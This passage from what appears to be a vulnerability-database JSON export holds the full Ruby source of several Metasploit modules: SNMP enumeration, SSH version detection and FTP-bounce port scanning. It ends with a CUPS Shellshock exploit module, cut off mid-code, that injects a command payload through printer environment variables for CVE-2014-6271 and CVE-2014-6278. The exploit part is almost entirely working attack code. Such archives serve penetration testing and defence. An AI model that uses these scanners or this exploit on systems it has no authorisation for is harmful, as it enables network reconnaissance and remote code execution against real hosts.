\"1.3.6.1.2.1.6.13.1.2\",\"1.3.6.1.2.1.6.13.1.3\",\"1.3.6.1.2.1.6.13.1.4\",\n \"1.3.6.1.2.1.6.13.1.5\",\"1.3.6.1.2.1.6.13.1.1\"\n ]) do |ladd,lport,radd,rport,state|\n\n if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)\n ladd = \"-\"\n else\n ladd = ladd.value\n end\n\n if (lport.value.to_s.empty? or lport.value.to_s =~ /noSuchInstance/)\n lport = \"-\"\n else\n lport = lport.value\n end\n\n if (radd.value.to_s.empty? or radd.value.to_s =~ /noSuchInstance/)\n radd = \"-\"\n else\n radd = radd.value\n end\n\n if (rport.value.to_s.empty? or rport.value.to_s =~ /noSuchInstance/)\n rport = \"-\"\n else\n rport = rport.value\n end\n\n case state.value\n when 1\n state = \"closed\"\n when 2\n state = \"listen\"\n when 3\n state = \"synSent\"\n when 4\n state = \"synReceived\"\n when 5\n state = \"established\"\n when 6\n state = \"finWait1\"\n when 7\n state = \"finWait2\"\n when 8\n state = \"closeWait\"\n when 9\n state = \"lastAck\"\n when 10\n state = \"closing\"\n when 11\n state = \"timeWait\"\n when 12\n state = \"deleteTCB\"\n else\n state = \"unknown\"\n end\n\n tcp.push([ladd, lport, radd, rport, state])\n end\n\n if not tcp.empty?\n output_data[\"TCP connections and listening ports\"] = [[\"Local address\",\"Local port\",\"Remote address\",\"Remote port\",\"State\"]] + tcp\n end\n\n udp = []\n\n snmp.walk([\"1.3.6.1.2.1.7.5.1.1\",\"1.3.6.1.2.1.7.5.1.2\"]) do |ladd,lport|\n udp.push([ladd.value, lport.value])\n end\n\n if not udp.empty?\n output_data[\"Listening UDP ports\"] = [[\"Local address\",\"Local port\"]] + udp\n end\n\n if (sysDesc =~ /Windows/)\n network_services = []\n n = 0\n snmp.walk([\"1.3.6.1.4.1.77.1.2.3.1.1\",\"1.3.6.1.4.1.77.1.2.3.1.2\"]) do |name,installed|\n network_services.push([n,name.value])\n n+=1\n end\n\n if not network_services.empty?\n output_data[\"Network services\"] = [[\"Index\",\"Name\"]] + network_services\n end\n\n share = []\n\n snmp.walk([\n \"1.3.6.1.4.1.77.1.2.27.1.1\",\"1.3.6.1.4.1.77.1.2.27.1.2\",\"1.3.6.1.4.1.77.1.2.27.1.3\"\n ]) do |name,path,comment|\n share.push({\" Name\"=>name.value, \" Path\"=>path.value, \" Comment\"=>comment.value})\n end\n\n if not share.empty?\n output_data[\"Share\"] = share\n end\n\n iis = {}\n\n http_totalBytesSentLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.2.0')\n if http_totalBytesSentLowWord.to_s !~ /Null/\n iis[\"TotalBytesSentLowWord\"] = http_totalBytesSentLowWord\n end\n\n http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')\n if http_totalBytesReceivedLowWord.to_s !~ /Null/\n iis[\"TotalBytesReceivedLowWord\"] = http_totalBytesReceivedLowWord\n end\n\n http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')\n if http_totalFilesSent.to_s !~ /Null/\n iis[\"TotalFilesSent\"] = http_totalFilesSent\n end\n\n http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')\n if http_currentAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentAnonymousUsers\"] = http_currentAnonymousUsers\n end\n\n http_currentNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.7.0')\n if http_currentNonAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentNonAnonymousUsers\"] = http_currentNonAnonymousUsers\n end\n\n http_totalAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.8.0')\n if http_totalAnonymousUsers.to_s !~ /Null/\n iis[\"TotalAnonymousUsers\"] = http_totalAnonymousUsers\n end\n\n http_totalNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.9.0')\n if http_totalNonAnonymousUsers.to_s !~ /Null/\n iis[\"TotalNonAnonymousUsers\"] = http_totalNonAnonymousUsers\n end\n\n http_maxAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.10.0')\n if http_maxAnonymousUsers.to_s !~ /Null/\n iis[\"MaxAnonymousUsers\"] = http_maxAnonymousUsers\n end\n\n http_maxNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.11.0')\n if http_maxNonAnonymousUsers.to_s !~ /Null/\n iis[\"MaxNonAnonymousUsers\"] = http_maxNonAnonymousUsers\n end\n\n http_currentConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.12.0')\n if http_currentConnections.to_s !~ /Null/\n iis[\"CurrentConnections\"] = http_currentConnections\n end\n\n http_maxConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.13.0')\n if http_maxConnections.to_s !~ /Null/\n iis[\"MaxConnections\"] = http_maxConnections\n end\n\n http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')\n if http_connectionAttempts.to_s !~ /Null/\n iis[\"ConnectionAttempts\"] = http_connectionAttempts\n end\n\n http_logonAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.15.0')\n if http_logonAttempts.to_s !~ /Null/\n iis[\"LogonAttempts\"] = http_logonAttempts\n end\n\n http_totalGets = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.16.0')\n if http_totalGets.to_s !~ /Null/\n iis[\"Gets\"] = http_totalGets\n end\n\n http_totalPosts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.17.0')\n if http_totalPosts.to_s !~ /Null/\n iis[\"Posts\"] = http_totalPosts\n end\n\n http_totalHeads = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.18.0')\n if http_totalHeads.to_s !~ /Null/\n iis[\"Heads\"] = http_totalHeads\n end\n\n http_totalOthers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.19.0')\n if http_totalOthers.to_s !~ /Null/\n iis[\"Others\"] = http_totalOthers\n end\n\n http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')\n if http_totalCGIRequests.to_s !~ /Null/\n iis[\"CGIRequests\"] = http_totalCGIRequests\n end\n\n http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')\n if http_totalBGIRequests.to_s !~ /Null/\n iis[\"BGIRequests\"] = http_totalBGIRequests\n end\n\n http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')\n if http_totalNotFoundErrors.to_s !~ /Null/\n iis[\"NotFoundErrors\"] = http_totalNotFoundErrors\n end\n\n if not iis.empty?\n output_data[\"IIS server information\"] = iis\n end\n end\n\n storage_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.2.3.1.1\", \"1.3.6.1.2.1.25.2.3.1.2\", \"1.3.6.1.2.1.25.2.3.1.3\",\n \"1.3.6.1.2.1.25.2.3.1.4\", \"1.3.6.1.2.1.25.2.3.1.5\", \"1.3.6.1.2.1.25.2.3.1.6\"\n ]) do |index,type,descr,allocation,size,used|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.2.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.2.1.2$/\n type.value = \"Ram\"\n when /^1.3.6.1.2.1.25.2.1.3$/\n type.value = \"Virtual Memory\"\n when /^1.3.6.1.2.1.25.2.1.4$/\n type.value = \"Fixed Disk\"\n when /^1.3.6.1.2.1.25.2.1.5$/\n type.value = \"Removable Disk\"\n when /^1.3.6.1.2.1.25.2.1.6$/\n type.value = \"Floppy Disk\"\n when /^1.3.6.1.2.1.25.2.1.7$/\n type.value = \"Compact Disc\"\n when /^1.3.6.1.2.1.25.2.1.8$/\n type.value = \"RamDisk\"\n when /^1.3.6.1.2.1.25.2.1.9$/\n type.value = \"Flash Memory\"\n when /^1.3.6.1.2.1.25.2.1.10$/\n type.value = \"Network Disk\"\n else\n type.value = \"unknown\"\n end\n\n allocation.value = \"unknown\" if allocation.value.to_s =~ /noSuchInstance/\n size.value = \"unknown\" if size.value.to_s =~ /noSuchInstance/\n used.value = \"unknown\" if used.value.to_s =~ /noSuchInstance/\n\n storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])\n end\n\n if not storage_information.empty?\n storage = []\n storage_information.each {|a,b,c,d,e,f|\n s = {}\n\n e = number_to_human_size(e,d)\n f = number_to_human_size(f,d)\n\n s[\"Description\"]= a\n s[\"Device id\"] = b\n s[\"Filesystem type\"] = c\n s[\"Device unit\"] = d\n s[\"Memory size\"] = e\n s[\"Memory used\"] = f\n\n storage.push(s)\n }\n output_data[\"Storage information\"] = storage\n end\n\n file_system = {}\n\n hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')\n if hrFSIndex.to_s !~ /Null/\n file_system[\"Index\"] = hrFSIndex\n end\n\n hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')\n if hrFSMountPoint.to_s !~ /Null/\n file_system[\"Mount point\"] = hrFSMountPoint\n end\n\n hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')\n if hrFSRemoteMountPoint.to_s !~ /Null/ and hrFSRemoteMountPoint.to_s !~ /^noSuch/\n if hrFSRemoteMountPoint.empty?\n hrFSRemoteMountPoint = '-'\n end\n file_system[\"Remote mount point\"] = hrFSRemoteMountPoint\n end\n\n hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')\n\n case hrFSType.to_s\n when /^1.3.6.1.2.1.25.3.9.1$/\n hrFSType = \"Other\"\n when /^1.3.6.1.2.1.25.3.9.2$/\n hrFSType = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.9.3$/\n hrFSType = \"BerkeleyFFS\"\n when /^1.3.6.1.2.1.25.3.9.4$/\n hrFSType = \"Sys5FS\"\n when /^1.3.6.1.2.1.25.3.9.5$/\n hrFSType = \"Fat\"\n when /^1.3.6.1.2.1.25.3.9.6$/\n hrFSType = \"HPFS\"\n when /^1.3.6.1.2.1.25.3.9.7$/\n hrFSType = \"HFS\"\n when /^1.3.6.1.2.1.25.3.9.8$/\n hrFSType = \"MFS\"\n when /^1.3.6.1.2.1.25.3.9.9$/\n hrFSType = \"NTFS\"\n when /^1.3.6.1.2.1.25.3.9.10$/\n hrFSType = \"VNode\"\n when /^1.3.6.1.2.1.25.3.9.11$/\n hrFSType = \"Journaled\"\n when /^1.3.6.1.2.1.25.3.9.12$/\n hrFSType = \"iso9660\"\n when /^1.3.6.1.2.1.25.3.9.13$/\n hrFSType = \"RockRidge\"\n when /^1.3.6.1.2.1.25.3.9.14$/\n hrFSType = \"NFS\"\n when /^1.3.6.1.2.1.25.3.9.15$/\n hrFSType = \"Netware\"\n when /^1.3.6.1.2.1.25.3.9.16$/\n hrFSType = \"AFS\"\n when /^1.3.6.1.2.1.25.3.9.17$/\n hrFSType = \"DFS\"\n when /^1.3.6.1.2.1.25.3.9.18$/\n hrFSType = \"Appleshare\"\n when /^1.3.6.1.2.1.25.3.9.19$/\n hrFSType = \"RFS\"\n when /^1.3.6.1.2.1.25.3.9.20$/\n hrFSType = \"DGCFS\"\n when /^1.3.6.1.2.1.25.3.9.21$/\n hrFSType = \"BFS\"\n when /^1.3.6.1.2.1.25.3.9.22$/\n hrFSType = \"FAT32\"\n when /^1.3.6.1.2.1.25.3.9.23$/\n hrFSType = \"LinuxExt2\"\n else\n hrFSType = \"Null\"\n end\n\n if hrFSType.to_s !~ /Null/\n file_system[\"Type\"] = hrFSType\n end\n\n hrFSAccess = snmp.get_value('1.3.6.1.2.1.25.3.8.1.5.1')\n if hrFSAccess.to_s !~ /Null/\n file_system[\"Access\"] = hrFSAccess\n end\n\n hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')\n if hrFSBootable.to_s !~ /Null/\n file_system[\"Bootable\"] = hrFSBootable\n end\n\n if not file_system.empty?\n output_data[\"File system information\"] = file_system\n end\n\n device_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.3.2.1.1\", \"1.3.6.1.2.1.25.3.2.1.2\",\n \"1.3.6.1.2.1.25.3.2.1.5\", \"1.3.6.1.2.1.25.3.2.1.3\"\n ]) do |index,type,status,descr|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.3.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.3.1.2$/\n type.value = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.1.3$/\n type.value = \"Processor\"\n when /^1.3.6.1.2.1.25.3.1.4$/\n type.value = \"Network\"\n when /^1.3.6.1.2.1.25.3.1.5$/\n type.value = \"Printer\"\n when /^1.3.6.1.2.1.25.3.1.6$/\n type.value = \"Disk Storage\"\n when /^1.3.6.1.2.1.25.3.1.10$/\n type.value = \"Video\"\n when /^1.3.6.1.2.1.25.3.1.11$/\n type.value = \"Audio\"\n when /^1.3.6.1.2.1.25.3.1.12$/\n type.value = \"Coprocessor\"\n when /^1.3.6.1.2.1.25.3.1.13$/\n type.value = \"Keyboard\"\n when /^1.3.6.1.2.1.25.3.1.14$/\n type.value = \"Modem\"\n when /^1.3.6.1.2.1.25.3.1.15$/\n type.value = \"Parallel Port\"\n when /^1.3.6.1.2.1.25.3.1.16$/\n type.value = \"Pointing\"\n when /^1.3.6.1.2.1.25.3.1.17$/\n type.value = \"Serial Port\"\n when /^1.3.6.1.2.1.25.3.1.18$/\n type.value = \"Tape\"\n when /^1.3.6.1.2.1.25.3.1.19$/\n type.value = \"Clock\"\n when /^1.3.6.1.2.1.25.3.1.20$/\n type.value = \"Volatile Memory\"\n when /^1.3.6.1.2.1.25.3.1.21$/\n type.value = \"Non Volatile Memory\"\n else\n type.value = \"unknown\"\n end\n\n case status.value\n when 1\n status.value = \"unknown\"\n when 2\n status.value = \"running\"\n when 3\n status.value = \"warning\"\n when 4\n status.value = \"testing\"\n when 5\n status.value = \"down\"\n else\n status.value = \"unknown\"\n end\n\n descr.value = \"unknown\" if descr.value.to_s =~ /noSuchInstance/\n\n device_information.push([index.value, type.value, status.value, descr.value])\n end\n\n if not device_information.empty?\n output_data[\"Device information\"] = [[\"Id\",\"Type\",\"Status\",\"Descr\"]] + device_information\n end\n\n software_list = []\n\n snmp.walk([\"1.3.6.1.2.1.25.6.3.1.1\",\"1.3.6.1.2.1.25.6.3.1.2\"]) do |index,name|\n software_list.push([index.value,name.value])\n end\n\n if not software_list.empty?\n output_data[\"Software components\"] = [[\"Index\",\"Name\"]] + software_list\n end\n\n process_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.4.2.1.1\", \"1.3.6.1.2.1.25.4.2.1.2\", \"1.3.6.1.2.1.25.4.2.1.4\",\n \"1.3.6.1.2.1.25.4.2.1.5\", \"1.3.6.1.2.1.25.4.2.1.7\"\n ]) do |id,name,path,param,status|\n\n if status.value == 1\n status.value = \"running\"\n elsif status.value == 2\n status.value = \"runnable\"\n else\n status.value = \"unknown\"\n end\n\n process_interfaces.push([id.value, status.value, name.value, path.value, param.value])\n end\n\n if not process_interfaces.empty?\n output_data[\"Processes\"] = [[\"Id\",\"Status\",\"Name\",\"Path\",\"Parameters\"]] + process_interfaces\n end\n\n print_line(\"\\n[*] System information:\\n\")\n\n line = \"\"\n width = 30 # name field width\n twidth = 32 # table like display cell width\n\n fields_order.each {|k|\n if not output_data.has_key?(k)\n next\n end\n\n v = output_data[k]\n\n case v\n when Array\n content = \"\"\n\n v.each{ |a|\n case a\n when Hash\n a.each{ |sk, sv|\n sk = truncate_to_twidth(sk, twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n content << \"\\n\"\n when Array\n a.each { |sv|\n sv = sv.to_s.strip\n # I don't like cutting info\n #sv = truncate_to_twidth(sv, twidth)\n content << sprintf(\"%-20s\", sv)\n }\n content << \"\\n\"\n else\n content << sprintf(\" %s\\n\", a)\n content << \"\\n\"\n end\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n\n when Hash\n content = \"\"\n v.each{ |sk, sv|\n sk = truncate_to_twidth(sk,twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n content << \"\\n\"\n else\n if (v.nil? or v.empty? or v =~ /Null/)\n v = '-'\n end\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => v\n )\n\n k = truncate_to_twidth(k,twidth)\n line << sprintf(\"%s%s: %s\\n\", k, \" \"*([0,width-k.length].max), v)\n end\n }\n\n print_line(line)\n print_line('')\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip} SNMP request timeout.\")\n rescue Rex::ConnectionError\n print_error(\"#{ip} Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue SNMP::UnsupportedVersion\n print_error(\"#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n elog(\"Unknown error: #{e.class} #{e}\")\n elog(\"Call stack:\\n#{e.backtrace.join \"\\n\"}\")\n ensure\n disconnect_snmp\n end\n end\n\n def truncate_to_twidth(string,twidth)\n string.slice(0..twidth-2)\n end\n\n def number_to_human_size(size,unit)\n size = size.first.to_i * unit.first.to_i\n\n if size < 1024\n \"#{size} bytes\"\n elsif size < 1024.0 * 1024.0\n \"%.02f KB\" % (size / 1024.0)\n elsif size < 1024.0 * 1024.0 * 1024.0\n \"%.02f MB\" % (size / 1024.0 / 1024.0)\n else\n \"%.02f GB\" % (size / 1024.0 / 1024.0 / 1024.0)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/snmp_enum.rb"}, {"lastseen": "2019-12-15T05:14:05", "bulletinFamily": "exploit", "description": "Detect SSH Version.\n", "modified": "2017-07-24T13:26:21", "published": "2009-05-11T02:46:59", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_VERSION", "href": "", "type": "metasploit", "title": "SSH Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'recog'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # the default timeout (in seconds) to wait, in total, for both a successful\n # connection to a given endpoint and for the initial protocol response\n # from the supposed SSH endpoint to be returned\n DEFAULT_TIMEOUT = 30\n\n def initialize\n super(\n 'Name' => 'SSH Version Scanner',\n 'Description' => 'Detect SSH Version.',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/SecureShell' ]\n ],\n 'Author' => [ 'Daniel van Eeden <metasploit[at]myname.nl>' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptInt.new('TIMEOUT', [true, 'Timeout for the SSH probe', DEFAULT_TIMEOUT])\n ],\n self.class\n )\n end\n\n def timeout\n datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']\n end\n\n\n def run_host(target_host)\n begin\n ::Timeout.timeout(timeout) do\n connect\n\n resp = sock.get_once(-1, timeout)\n\n if ! resp\n vprint_warning(\"No response\")\n return\n end\n\n ident, first_message = resp.split(/[\\r\\n]+/)\n info = \"\"\n\n if /^SSH-\\d+\\.\\d+-(.*)$/ !~ ident\n vprint_warning(\"Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}\")\n return\n end\n\n banner = $1\n\n # Try to match with Recog and show the relevant fields to the user\n recog_match = Recog::Nizer.match('ssh.banner', banner)\n if recog_match\n info << \" ( \"\n recog_match.each_pair do |k,v|\n next if k == 'matched'\n info << \"#{k}=#{v} \"\n end\n info << \")\"\n end\n\n # Check to see if this is Kippo, which sends a premature\n # key init exchange right on top of the SSH version without\n # waiting for the required client identification string.\n if first_message && first_message.size >= 5\n extra = first_message.unpack(\"NCCA*\") # sz, pad_sz, code, data\n if (extra.last.size + 2 == extra[0]) && extra[2] == 20\n info << \" (Kippo Honeypot)\"\n end\n end\n\n print_good(\"SSH server version: #{ident}#{info}\")\n report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident)\n end\n rescue Timeout::Error\n vprint_warning(\"Timed out after #{timeout} seconds. Skipping.\")\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_version.rb"}, {"lastseen": "2019-12-14T00:25:09", "bulletinFamily": "exploit", "description": "Enumerate TCP services via the FTP bounce PORT/LIST method.\n", "modified": "2019-03-05T09:38:51", "published": "2009-01-23T02:05:28", "id": "MSF:AUXILIARY/SCANNER/PORTSCAN/FTPBOUNCE", "href": "", "type": "metasploit", "title": "FTP Bounce Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Order is important here\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Ftp\n\n def initialize\n super(\n 'Name' => 'FTP Bounce Port Scanner',\n 'Description' => %q{\n Enumerate TCP services via the FTP bounce PORT/LIST\n method.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 22-25,80,110-900)\", \"1-10000\"]),\n OptAddress.new('BOUNCEHOST', [true, \"FTP relay host\"]),\n OptPort.new('BOUNCEPORT', [true, \"FTP relay port\", 21]),\n OptInt.new('DELAY', [true, \"The delay between connections, per thread, in milliseconds\", 0]),\n OptInt.new('JITTER', [true, \"The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.\", 0])\n ])\n\n deregister_options('RPORT')\n end\n\n # No IPv6 support yet\n def support_ipv6?\n false\n end\n\n def rhost\n datastore['BOUNCEHOST']\n end\n\n def rport\n datastore['BOUNCEPORT']\n end\n\n def run_host(ip)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n if ports.empty?\n raise Msf::OptionValidateError.new(['PORTS'])\n end\n\n jitter_value = datastore['JITTER'].to_i\n if jitter_value < 0\n raise Msf::OptionValidateError.new(['JITTER'])\n end\n\n delay_value = datastore['DELAY'].to_i\n if delay_value < 0\n raise Msf::OptionValidateError.new(['DELAY'])\n end\n\n return if not connect_login\n\n ports.each do |port|\n # Clear out the receive buffer since we're heavily dependent\n # on the response codes. We need to do this between every\n # port scan attempt unfortunately.\n while true\n r = sock.get_once(-1, 0.25)\n break if not r or r.empty?\n end\n\n begin\n\n # Add the delay based on JITTER and DELAY if needs be\n add_delay_jitter(delay_value,jitter_value)\n\n host = (ip.split('.') + [port / 256, port % 256]).join(',')\n resp = send_cmd([\"PORT\", host])\n\n if resp =~ /^5/\n #print_error(\"Got error from PORT to #{ip}:#{port}\")\n next\n elsif not resp\n next\n end\n\n resp = send_cmd([\"LIST\"])\n\n if resp =~ /^[12]/\n print_good(\" TCP OPEN #{ip}:#{port}\")\n report_service(:host => ip, :port => port)\n end\n rescue ::Exception\n print_error(\"Unknown error: #{$!}\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/portscan/ftpbounce.rb"}], "exploitdb": [{"lastseen": "2016-02-04T00:39:00", "bulletinFamily": "exploit", "description": "CUPS Filter Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-...", "modified": "2014-10-29T00:00:00", "published": "2014-10-29T00:00:00", "id": "EDB-ID:35115", "href": "https://www.exploit-db.com/exploits/35115/", "type": "exploitdb", "title": "CUPS Filter Bash Environment Variable Code Injection", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CUPS Filter Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module exploits a post-auth code injection in specially crafted\r\n environment variables in Bash, specifically targeting CUPS filters\r\n through the PRINTER_INFO and PRINTER_LOCATION variables by default.\r\n },\r\n 'Author' => [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'lcamtuf', # CVE-2014-6278\r\n 'Brendan Coles <bcoles[at]gmail.com>' # msf\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['CVE', '2014-6278'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\\x0A\\x0D\",\r\n 'DisableNops' => true\r\n },\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic bash awk ruby'\r\n },\r\n # Tested:\r\n # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)\r\n # - CUPS version 1.5.3 on Debian 7 (x64)\r\n # - CUPS version 1.6.2 on Fedora 19 (x64)\r\n # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)\r\n 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014',\r\n 'License' => MSF_LICENSE\r\n ))\r\n register_options([\r\n Opt::RPORT(631),\r\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\r\n OptString.new('USERNAME', [ true, 'CUPS username', 'root']),\r\n OptString.new('PASSWORD', [ true, 'CUPS user password', '']),\r\n OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),\r\n OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; $(#{cmd}) & }\r\n end\r\n\r\n #\r\n # CVE-2014-6278\r\n #\r\n def cve_2014_6278(cmd)\r\n %{() { _; } >_[$($())] { echo -e \"\\r\\n$(#{cmd})\\r\\n\" ; }}\r\n end\r\n\r\n #\r\n # Check credentials\r\n #\r\n def check\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n res = add_printer(printer_name, '')\r\n if !res\r\n vprint_error(\"#{peer} - No response from host\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.headers['Server'] =~ /CUPS\\/([\\d\\.]+)/\r\n vprint_status(\"#{peer} - Found CUPS version #{$1}\")\r\n else\r\n print_status(\"#{peer} - Target is not a CUPS web server\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n if res.body =~ /Set Default Options for #{printer_name}/\r\n vprint_good(\"#{peer} - Added printer successfully\")\r\n delete_printer(printer_name)\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_error(\"#{peer} - Authentication failed\")\r\n elsif res.code == 426\r\n vprint_error(\"#{peer} - SSL required - set SSL true\")\r\n end\r\n Exploit::CheckCode::Detected\r\n end\r\n\r\n #\r\n # Exploit\r\n #\r\n def exploit\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n\r\n # Select target CVE\r\n case datastore['CVE']\r\n when 'CVE-2014-6278'\r\n cmd = cve_2014_6278(payload.raw)\r\n else\r\n cmd = cve_2014_6271(payload.raw)\r\n end\r\n\r\n # Add a printer containing the payload\r\n # with a CUPS filter pointing to /bin/bash\r\n res = add_printer(printer_name, cmd)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add printer - Connection failed.\")\r\n elsif res.body =~ /Set Default Options for #{printer_name}/\r\n print_good(\"#{peer} - Added printer successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add printer - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add printer - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add printer.\")\r\n end\r\n\r\n # Add a test page to the print queue.\r\n # The print job triggers execution of the bash filter\r\n # which executes the payload in the environment variables.\r\n res = print_test_page(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, 